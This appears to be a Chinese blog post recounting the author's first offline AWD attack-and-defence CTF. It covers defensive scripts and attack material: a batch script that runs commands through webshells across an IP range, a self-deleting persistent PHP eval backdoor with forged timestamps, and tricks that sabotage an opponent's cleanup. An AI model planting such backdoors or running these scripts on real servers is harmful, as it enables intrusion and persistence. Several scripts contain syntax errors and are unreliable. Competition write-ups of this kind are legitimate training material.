





<!doctype html>
<html lang="en">

<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>
<script type="text/javascript" 
src="//cdnjs.cloudflare.com/ajax/libs/prettify/r298/prettify.min.js">
</script>
<link href=  "/plugins/code-theme/tomorrow.css" type="text/css" rel="stylesheet" />
<link rel="stylesheet" href="/plugins/github-markdown.css">

<head>
  <meta charset="UTF-8" name="viewport" content="width=device-width,initial-scale=1">
  
    
    
      <link rel="stylesheet" href="/css/legend.css">
    
  
<meta name="generator" content="Hexo 4.2.0"></head>

<body id="body-x">
<div id="layout-content">
  <div id="menu-outer-x">
  <div id="menu-inner">
    
    
    <div id="site-title">
      Momax's blog
    </div>
    

     
    <div>
    
      
      <a href="/">首页</a>
      
    
      
      <a href="/archives">归档</a>
      
    
    </div>
  </div>
</div> 
  <div id="content-outer">
    <div id="content-inner">
      
      
  <article class="markdown-body">
    <h2 id="post-title">记第一次参加所谓线下awd
       
        <div id="post-time" datetime="2020-12-19T15:37:01.122Z">
          2020-12-19
        </div>
      
    </h2>
    <p>欢迎使用 <strong>{小书匠}(xiaoshujiang)编辑器</strong>，您可以通过 <code>小书匠主按钮&gt;模板</code> 里的模板管理来改变新建文章的内容。</p>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>在参加比赛之前，团队大师傅为了让我们知道怎么打，特意给我们搭的环境，在经过了好多天的模拟之后，我也大致了解了awd该怎么去玩。</p>
<h1 id="什么是awd"><a href="#什么是awd" class="headerlink" title="什么是awd"></a>什么是awd</h1><p><strong>AWD：Attack With Defence，译为攻击与守护，是指在比赛中每个队伍维护一台或者多台服务器，服务器中有多个漏洞和一些预留后门，利用漏洞攻击其他队伍可以得分，而修复漏洞看主办方规定，可能加分也可能不加分。</strong></p>
<ul>
<li>服务器一般为web服务器，大多数为Linux操作系统，flag一般放在根目录下</li>
<li>flag会在规定时间进行一次刷新</li>
<li>每个队伍都有一个自己的初始分数</li>
<li>主办方会对每个队伍服务器进行check，服务器被判定宕机会扣除本轮flag分数</li>
<li>一般会给队伍一个低权限用户，一般不会是直接给root权限，需要每个队伍去进行提权<h1 id="比赛方式"><a href="#比赛方式" class="headerlink" title="比赛方式"></a>比赛方式</h1>一般比赛会是flag放在根目录，然后通过获取其他队伍的shell进行读取操作，得到flag。<br>在比赛中，主办方可能会告诉你其他队伍的IP，也可能不说，一般在同一个B段或者C段，因此可以用nmap扫描工具发现其他队伍的IP。</li>
</ul>
<pre><code class="php">nmap -sn 192.168.171.0/24</code></pre>
<h1 id="比赛分工"><a href="#比赛分工" class="headerlink" title="比赛分工"></a>比赛分工</h1><p>awd模式一般分为三个人，一个人防御，两个人进攻。</p>
<h1 id="赛前准备"><a href="#赛前准备" class="headerlink" title="赛前准备"></a>赛前准备</h1><p>首先，准备好各种的脚本，批量getflag脚本，批量提交flag脚本(没有这两个，你就需要去手动获得对方shell，然后读取flag，纯手工不仅手累，而且效率低)。然后就是各种的比如文件监控脚本，waf以及其他的一些防御脚本，此外还要准备各种马，一句话，不死马，变种马，冰蝎等等。不至于比赛中耗费时间去写。<br>然后就是准备好自己的心态，不要发生心态爆炸的情况。<br>最后就是队伍内分好工作，进行详细的沟通以及在测试联系时多沟通。</p>
<h1 id="比赛过程"><a href="#比赛过程" class="headerlink" title="比赛过程"></a>比赛过程</h1><h2 id="防守"><a href="#防守" class="headerlink" title="防守"></a>防守</h2><p>把网站根目录文件备份下来，拖到D盾扫描预留后门，然后抓紧时间删除预留后门，然后可以把文件拖到seay中进行审计，逐步排除危险漏洞等文件内容。<br>另外可以利用脚本进行防守。一般分为两种脚本：WAF和文件监控<br><code>WAF：</code><br>对于waf，GitHub上有许多种类版本的，可以视情况选择。具体使用：</p>
<ol>
<li>将waf.php文件上传到要包含的文件目录</li>
<li>在页面中加入防护。<br>可以在所需防护的页面源码中加入requtre_once(‘waf.php’);或者在网站的一个共用文件，例如config.inc.php中加入requtre_once(‘waf.php’);<br>然后在这里贴上大师傅的<br>常见PHP系统添加文件</li>
</ol>
<blockquote>
<p>PHPCMS V9 \phpcms\base.php<br>PHPWIND8.7 \data\sql_config.php<br>DEDECMS5.7 \data\common.inc.php<br>DiscuzX2   \config\config_global.php<br>Wordpress   \wp-config.php<br>Metinfo   \include\head.php</p>
</blockquote>
<p>在php.ini中找到</p>
<pre><code class="php">Automatically add files before or after any PHP document.
auto_prepend_file = 360_safe3.php路径;</code></pre>
<p>特别注意的是：在自己服务器上面挂waf可能会导致网页主页等一些功能显示异常，需要自己详细的考虑。<br><code>文件监控</code><br>对于文件监控脚本，GitHub上面也有很多，具体的功能就是会发现服务器新上传的文件并进行拦截，发现被修改的文件会立即修复，可以防止别人的上传shell攻击等。</p>
<pre><code class="jpython"># -*- coding: utf-8 -*-
#use: python file_check.py ./

import os
import hashlib
import shutil
import ntpath
import time

CWD = os.getcwd()
FILE_MD5_DICT = {}      # 文件MD5字典
ORIGIN_FILE_LIST = []

# 特殊文件路径字符串
Special_path_str = &#39;drops_JWI96TY7ZKNMQPDRUOSG0FLH41A3C5EXVB82&#39;
bakstring = &#39;bak_EAR1IBM0JT9HZ75WU4Y3Q8KLPCX26NDFOGVS&#39;
logstring = &#39;log_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD&#39;
webshellstring = &#39;webshell_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD&#39;
difffile = &#39;diff_UMTGPJO17F82K35Z0LEDA6QB9WH4IYRXVSCN&#39;

Special_string = &#39;drops_log&#39;  # 免死金牌
UNICODE_ENCODING = &quot;utf-8&quot;
INVALID_UNICODE_CHAR_FORMAT = r&quot;\?%02x&quot;

# 文件路径字典
spec_base_path = os.path.realpath(os.path.join(CWD, Special_path_str))
Special_path = {
    &#39;bak&#39; : os.path.realpath(os.path.join(spec_base_path, bakstring)),
    &#39;log&#39; : os.path.realpath(os.path.join(spec_base_path, logstring)),
    &#39;webshell&#39; : os.path.realpath(os.path.join(spec_base_path, webshellstring)),
    &#39;difffile&#39; : os.path.realpath(os.path.join(spec_base_path, difffile)),
}

def isListLike(value):
    return isinstance(value, (list, tuple, set))

# 获取Unicode编码
def getUnicode(value, encoding=None, noneToNull=False):

    if noneToNull and value is None:
        return NULL

    if isListLike(value):
        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
        return value

    if isinstance(value, unicode):
        return value
    elif isinstance(value, basestring):
        while True:
            try:
                return unicode(value, encoding or UNICODE_ENCODING)
            except UnicodeDecodeError, ex:
                try:
                    return unicode(value, UNICODE_ENCODING)
                except:
                    value = value[:ex.start] + &quot;&quot;.join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
    else:
        try:
            return unicode(value)
        except UnicodeDecodeError:
            return unicode(str(value), errors=&quot;ignore&quot;)

# 目录创建
def mkdir_p(path):
    import errno
    try:
        os.makedirs(path)
    except OSError as exc:
        if exc.errno == errno.EEXIST and os.path.isdir(path):
            pass
        else: raise

# 获取当前所有文件路径
def getfilelist(cwd):
    filelist = []
    for root,subdirs, files in os.walk(cwd):
        for filepath in files:
            originalfile = os.path.join(root, filepath)
            if Special_path_str not in originalfile:
                filelist.append(originalfile)
    return filelist

# 计算机文件MD5值
def calcMD5(filepath):
    try:
        with open(filepath,&#39;rb&#39;) as f:
            md5obj = hashlib.md5()
            md5obj.update(f.read())
            hash = md5obj.hexdigest()
            return hash
    except Exception, e:
        print u&#39;[!] getmd5_error : &#39; + getUnicode(filepath)
        print getUnicode(e)
        try:
            ORIGIN_FILE_LIST.remove(filepath)
            FILE_MD5_DICT.pop(filepath, None)
        except KeyError, e:
            pass

# 获取所有文件MD5
def getfilemd5dict(filelist = []):
    filemd5dict = {}
    for ori_file in filelist:
        if Special_path_str not in ori_file:
            md5 = calcMD5(os.path.realpath(ori_file))
            if md5:
                filemd5dict[ori_file] = md5
    return filemd5dict

# 备份所有文件
def backup_file(filelist=[]):
    # if len(os.listdir(Special_path[&#39;bak&#39;])) == 0:
    for filepath in filelist:
        if Special_path_str not in filepath:
            shutil.copy2(filepath, Special_path[&#39;bak&#39;])

if __name__ == &#39;__main__&#39;:
    print u&#39;---------start------------&#39;
    for value in Special_path:
        mkdir_p(Special_path[value])
    # 获取所有文件路径，并获取所有文件的MD5，同时备份所有文件
    ORIGIN_FILE_LIST = getfilelist(CWD)
    FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
    backup_file(ORIGIN_FILE_LIST) # TODO 备份文件可能会产生重名BUG
    print u&#39;[*] pre work end!&#39;
    while True:
        file_list = getfilelist(CWD)
        # 移除新上传文件
        diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST))
        if len(diff_file_list) != 0:
            # import pdb;pdb.set_trace()
            for filepath in diff_file_list:
                try:
                    f = open(filepath, &#39;r&#39;).read()
                except Exception, e:
                    break
                if Special_string not in f:
                    try:
                        print u&#39;[*] webshell find : &#39; + getUnicode(filepath)
                        shutil.move(filepath, os.path.join(Special_path[&#39;webshell&#39;], ntpath.basename(filepath) + &#39;.txt&#39;))
                    except Exception as e:
                        print u&#39;[!] move webshell error, &quot;%s&quot; maybe is webshell.&#39;%getUnicode(filepath)
                    try:
                        f = open(os.path.join(Special_path[&#39;log&#39;], &#39;log.txt&#39;), &#39;a&#39;)
                        f.write(&#39;newfile: &#39; + getUnicode(filepath) + &#39; : &#39; + str(time.ctime()) + &#39;\n&#39;)
                        f.close()
                    except Exception as e:
                        print u&#39;[-] log error : file move error: &#39; + getUnicode(e)

        # 防止任意文件被修改,还原被修改文件
        md5_dict = getfilemd5dict(ORIGIN_FILE_LIST)
        for filekey in md5_dict:
            if md5_dict[filekey] != FILE_MD5_DICT[filekey]:
                try:
                    f = open(filekey, &#39;r&#39;).read()
                except Exception, e:
                    break
                if Special_string not in f:
                    try:
                        print u&#39;[*] file had be change : &#39; + getUnicode(filekey)
                        shutil.move(filekey, os.path.join(Special_path[&#39;difffile&#39;], ntpath.basename(filekey) + &#39;.txt&#39;))
                        shutil.move(os.path.join(Special_path[&#39;bak&#39;], ntpath.basename(filekey)), filekey)
                    except Exception as e:
                        print u&#39;[!] move webshell error, &quot;%s&quot; maybe is webshell.&#39;%getUnicode(filekey)
                    try:
                        f = open(os.path.join(Special_path[&#39;log&#39;], &#39;log.txt&#39;), &#39;a&#39;)
                        f.write(&#39;diff_file: &#39; + getUnicode(filekey) + &#39; : &#39; + getUnicode(time.ctime()) + &#39;\n&#39;)
                        f.close()
                    except Exception as e:
                        print u&#39;[-] log error : done_diff: &#39; + getUnicode(filekey)
                        pass
        time.sleep(2)
        # print &#39;[*] &#39; + getUnicode(time.ctime())</code></pre>
<p><code>日志分析</code><br>利用命令行，输入<code>tailf /var/log/apache2/access.log</code><br>查看日志文件，进行分析，观察攻击者是以哪个方式进行攻击的。</p>
<h2 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h2><p><code>批量得到flag脚本:</code></p>
<pre><code class="python">#coding=utf-8
import requests
url_head=&quot;http://10.100.100.&quot;    #网段
shell_addr=&quot;/upload/url/shell.php&quot; #木马路径
passwd=&quot;xiaoma&quot;                    #木马密码
port=&quot;&quot;
payload = {passwd: &#39;System(\&#39;cat /flag\&#39;);&#39;}

webshelllist=open(&quot;webshelllist.txt&quot;,&quot;w&quot;)
flag=open(&quot;flag.txt&quot;,&quot;w&quot;)

for i in range(130,160
):
    url=url_head+str(i)+&quot;:&quot;+port+shell_addr
    try:
        res=requests.post(url,payload,timeout=1)
        if res.status_code == requests.codes.ok:
            result = url+&quot; connect shell sucess,flag is &quot;+res.text
            print (result)
            flag.write(result+&quot;\n&quot;);
            print &gt;&gt;flag,result
            print &gt;&gt;webshelllist,url+&quot;,&quot;+passwd
        else:
            print (&quot;shell 404&quot;)
    except:
        print (url+&quot; connect shell fail&quot;)

webshelllist.close()
flag.close()</code></pre>
<p><code>批量提交flag脚本：</code></p>
<pre><code class="python">def submit(flag, token):
    url = &quot;wangzhi&quot;
    pos = {
        &quot;flag&quot;:flag
        &quot;token&quot;:token
    }
    print &quot;[+] Submiting flag : [%s]&quot; % (pos)
    response = requests.post(url,data=data)
    content = response.content
    print &quot;[+] Content : %s &quot; % (content)
    if failed in content:
        print &quot;[-]failed&quot;
        return False
    else:
        print &quot;[+] Success!&quot;
        return True</code></pre>
<p>但是很可惜，在这次 <strong>“awd”</strong> 比赛中，并没有用上。而且在用的时候，需要进行一些修改，调试。</p>
<p> <code>种不死马</code><br> 在比赛过程中，可以抢一波预留后门，得到shell，然后往服务器里面种不死马，进一步维护自己的权限，然后可以用分裂马等一些马传上去。<br> 对于不死马，GitHub上面也有好多，这里给出我自己的一个不死马。有兴趣的可以在本地尝试</p>
<pre><code class="php"> &lt;?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = &#39;.shell.php&#39;;
$code = &#39;&lt;?php if(md5($_GET[&quot;passwd&quot;])==&quot;76a2173be6393254e72ffa4d6df1030a&quot;){@eval($_REQUEST[&#39;cmd&#39;]);} ?&gt;&#39;;
while (1){
    file_put_contents($file,$code);
    system(&#39;touch -m -d &quot;2018-12-01 09:10:12&quot; .shell.php&#39;);
    usleep(5000);
}
?&gt;</code></pre>
<p> 而对于删除不死马，首先需要找到他的进程，关掉进程之后，才能删掉，不然会一直生成，删不掉。<br> 而对于关闭进程，这里贴出自己用的命令</p>
<pre><code class="shell"> ps aux | grep www-data | awk &#39;{print $2}&#39; | xargs kill -9 //删除www-date用户下的所有进程
接着直接删除不死马文件</code></pre>
<h2 id="骚姿势"><a href="#骚姿势" class="headerlink" title="骚姿势"></a>骚姿势</h2><p> 在awd比赛中，往往有一些大师傅热衷于去搅屎，而在这里也贴出自己团队大师傅说的一些骚姿势</p>
<h3 id="起别名"><a href="#起别名" class="headerlink" title="起别名"></a>起别名</h3><p> 在Linux系统中，可以通过<code>alias</code>对系统命令起一些别名，这样子用本来的名字时会出现你事先设置好的东西，而不是执行这个命令。<br> 比如：<code>alias cat=&quot;echo</code>date<code>|md5sum|cut -d &#39; &#39; -f1||&quot;</code> 这个命令用于在输入<code>cat</code>时输出一串类似flag的字符串。<br> <img src="./images/1608390930556.png" alt="效果图"></p>
<p>想要删除时只需要输入<code>alias -a</code>即可。</p>
<h3 id="软链接"><a href="#软链接" class="headerlink" title="软链接"></a>软链接</h3><p>在得到对方shell之后，对方肯定会发现后门文件，就会想办法进行修补，这时候可以用Linux中的软链接功能，把flag软链接道到一个可写可读文件中。<br><img src="./images/123.png" alt="enter description here"></p>
<h3 id="文件名称"><a href="#文件名称" class="headerlink" title="文件名称"></a>文件名称</h3><p>对于文件名称，一般写入不死马用的都是.xxx.php隐藏起来，但是一看就知道有很大嫌疑，所以名字可以用-xxx.php来命名，这样子当你用命令行删除时，Linux会默认-后面是命令参数而无法执行，只能手动去删除。</p>
<h3 id="修改文件权限"><a href="#修改文件权限" class="headerlink" title="修改文件权限"></a>修改文件权限</h3><p>对于一些文件有写权限的可以选择修改他的权限，让别人无法往里面写入文件<br>命令<code>chmod 555 指定文件路径</code></p>
<h3 id="其他搅屎操作"><a href="#其他搅屎操作" class="headerlink" title="其他搅屎操作"></a>其他搅屎操作</h3><p>很多的，例如封对手IP了什么的，好多搅屎操作都是在大师傅们的无聊中搞出来了，不过这样的awd打起来不是更有意思吗？</p>
<h1 id="尾言"><a href="#尾言" class="headerlink" title="尾言"></a>尾言</h1><p>本来打算是这次参加线下赛之后回来总结一下自己的一些心得的，但是怎么说呢，这个线下赛一言难尽，也挺不错的，最起码接触了一下线下awd实战，不管怎样，这对于之后的学习都会有帮助的，继续加油！</p>

  </article>

  
    
    
      <div id="page-prev-next">
        
        
          <a id="page-prev-a" href="/2021/01/22/work/"> ← work </a>
        

        
        
          <a id="page-next-a" href="/2020/12/16/buu%E5%AD%A6%E4%B9%A0%E4%B9%8B%E8%B7%AF/"> buu学习之路 → </a>
        
      </div>
    
    
    
    

    
    

  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div id="reward_comment">文章对我有帮助，打赏作者</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/wechatpay.png" alt="moMaxX WeChat Pay"/>
          <p>微信</p>
        </div>
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/alipay.png" alt="moMaxX Alipay"/>
          <p>支付宝</p>
        </div> 
      
    </div>
  </div>


  

    </div>
  </div>
</div>



<div id="bottom-outer">
  
  <div id="bottom-inner">
    moMaxX 
    ©2021 |Powered by  
    <a href="http://hexo.io" target="_blank">Hexo</a> with theme 
    <a href="https://github.com/iHongRen/legend" target="_blank">legend</a>
  </div>
    
    
    
      <a href="/atom.xml">
      
      <img src=/images/rss.png height="18" width="18">
      
</div> 


  
  
    <script src="/js/legend.js"></script>
  


</body>
</html>


<script>
$(window).on('load', function(){
   $('pre').addClass('prettyprint').attr('style', 'overflow:auto;');
   prettyPrint();
 });
</script>

